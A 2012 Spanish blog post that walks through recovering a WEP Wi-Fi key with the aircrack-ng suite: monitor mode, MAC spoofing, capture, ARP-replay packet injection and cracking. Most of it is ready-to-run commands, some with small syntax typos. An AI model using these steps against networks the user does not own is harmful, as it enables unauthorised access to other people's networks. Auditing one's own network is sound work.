13 agosto, 2012

Auditar Wifi (seguridad wep)


Hola a todos!

Este artículo quizás sea muy fácil, nada novedoso, sobre todo para los más experimentados, pero, aunque no os lo creáis aún sigue habiendo mucho WEP por ahí…

Vamos haya, ahí bastantes distribuciones Linux para auditar redes inalámbricas, a mi me gusta mucho Bactrack, que se encuentra en su versión 5 R2.

WEP es el acrónimo de Wired Equivalent Privacy, en español Privacidad Equivalente ha Cableado, es un algoritmo muy débil porque utiliza el algoritmo de cifrado RC4.
Vamos a ver como en cinco minutos tenemos la clave de la red fácilmente.

Lo primero que deberíamos hacer es cambiarnos, que siempre recomiendo cuando hacemos “pruebas” es montarnos un laboratorio y para ello recomiendo correr siempre los live-CD y S.O en una maquina virtual. Una vez que tenemos el S.O en la maquina virtual abrimos la consola de comandos.

1º airmon-ng     (para poner la tarjeta en modo monitor.)

2º Es recomendable cambiar la Mac de nuestra maquina, para ello ponemos:
Macchanger-m 00:11:22:33:44:55, por ejemplo

airmon-ng start wlan0 (en el modo monitor queda renombrada la tarjeta como mon.)

airodump-ng mon0 (en este apartado ya vemos las redes disponibles.)

5º  (A continuación pulsamos control + C para parar el escaneo)

6º  airodump-ng mon0 --bssid mac de la red a escanear --channel nº canal –write demo
Ejemplo: ( airodump-ng mon0 --bssid 55:66:78:12:00:45  --channel 3 --write demo

7º (Si la red a auditor no esta emitiendo datas, es decir no esta generando tráfico de red, nunca vamos a generar suficientes datas para conseguir la key, pues tendréis que inyectar tráfico, vamos a ello.)

Aireplay-ng el canal de la red mon0 –b mac de la red a auditor  -h station
Aireplay-ng -3 mon0 –b 55:66:78:12:00:45 –h 33:44:55:78:00:78

8º (Si ya hemos generado suficientes datas proseguimos.)
ls
aircrack-ng demo-01.cap

Y premio! nos pondrá un mensaje de “KEY FOUND” nos dará la clave en texto plano.

No deberíais tardar más de diez minutos.


Hasta la próxima, saludos.

0 comentarios:

Publicar un comentario